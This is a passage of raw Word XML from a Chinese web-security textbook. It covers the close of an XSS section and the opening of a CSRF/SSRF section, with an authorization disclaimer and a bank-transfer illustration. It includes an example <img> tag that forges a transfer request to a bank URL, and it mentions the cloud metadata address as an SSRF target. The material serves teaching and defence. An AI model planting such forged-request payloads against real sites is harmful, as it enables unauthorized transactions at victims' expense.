        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验，利用浏览器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DevTools </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">断点调试，找出将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数写入页面的不安全</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码，并用弹窗成功证明。注意该平台同样为授权学习环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是数据与代码混淆的客户端注入，根源在于用户输入被当作可执行内容嵌入页面。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存储型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">影响最广，反射型需用户交互，DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型仅于客户端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中触发。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证漏洞仅需教学最小弹窗证明，严禁在非授权环境下执行任何脚本。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心防御是上下文感知的输出编码，辅以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSP、HttpOnly Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和安全框架。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF、CSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报告和日志监控发现和阻断</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击，但根本解决必须回归代码修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Testing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide，XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">专项测试方法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- PortSwigger Web Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Academy，XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全系列实验（反射/存储/DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">/拓展）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Stuttard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pinto，《The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web Application Hacker’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handbook》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Attacking the Client”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OWASP Cheat Sheet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Series，《XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevention Cheat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Sheet》与《DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> based XSS Prevention Cheat Sheet》。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Mozilla Developer Network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(MDN)，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Set‑Cookie.HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文档。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="190"/>
    <w:bookmarkStart w:id="191" w:name="csrf-与-ssrf检测防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.2 CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF·检测防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作仅供读者在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自建隔离实验室环境、官方授权靶机（DVWA，回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ch2）、或已获书面授权的渗透测试目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上执行。实验网络必须与生产网络及互联网物理或逻辑隔离。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">未经授权对他人系统发起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF/SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击属于违法犯罪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。SSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尤其危险，一旦成功可能直接访问云环境元数据接口（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">169.254.169.254</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）或内网数据库——即使在授权测试中也需严格遵守</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RoE（Rules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Engagement，交战规则，回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch3），仅在授权范围内操作，不得横向移动至超出范围的内网目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节依赖已建立的基础，读者应已掌握：①HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议基础，尤其是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与会话机制的通信模型——浏览器如何自动附加凭据（回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch8 HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全要点）；②同源策略（SOP,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Same-Origin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Policy）的隔离假设及其在跨站攻击中的绕过逻辑（本章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部分已讨论）；③Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截与改包重放的操作流（Ch8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实操单元）。本节两个主题——CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF——均属于“请求伪造”（Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Forgery）家族：前者滥用“浏览器自动携带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie”的信任模型，让受害者在不知情下以自身身份发起请求；后者滥用“服务器可对外发起连接”的能力，诱导其访问本不应可达的内部资源。二者违背的假设不同，但攻击根源都指向“请求发起方与意图的不可验证”，与上一节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对代码注入信任的滥用形成互补视角——XSS、CSRF、SSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三者共同构成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">客户端安全的防御全景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF：滥用浏览器自动凭据的信任假设</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF（Cross-Site</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Forgery，跨站请求伪造）违背的假设是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">请求若携带了合法的认证凭据（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie），便代表了用户本人的真实意图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。浏览器的设计哲学——在向某域发请求时自动附加该域的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie——正是这一假设的技术体现，也是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击可成立的根本前提。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉（大白话）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。假设你正在浏览器里登录了银行网站</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bank.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，此时浏览器里存着该域的有效</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie。你又在另一个标签页打开了攻击者精心构造的页面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">evil.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这个页面上有一个隐藏的表单，它自动向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bank.com/transfer?to=attacker&amp;amount=10000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。浏览器看到请求目标是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bank.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，便毫不犹豫地把你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一并贴了上去。服务器收到这个带有有效</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的转账请求，验证通过，转账执行——而这一切在你毫无察觉的情况下发生。攻击者利用的并非代码注入，而是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对认证凭据附着机制的滥用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的典型攻击模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。一次经典</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击包含以下要素（①通用原理）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标站点存在一个可被伪造的状态改变操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（转账、修改密码、修改邮箱等）。该操作通过可预测的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和参数完成，且仅依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行认证，不具备额外的一次性验证机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">受害者已经在目标站点持有有效会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（已登录，Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">未过期）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者能够诱导受害者浏览器发起跨站请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。诱导方式可以是：隐藏在论坛帖子里的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签（GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src="http://bank.com/transfer?to=attacker&amp;amount=10000"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、自动提交的隐藏表单（POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求）、或被注入的恶意脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（4）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
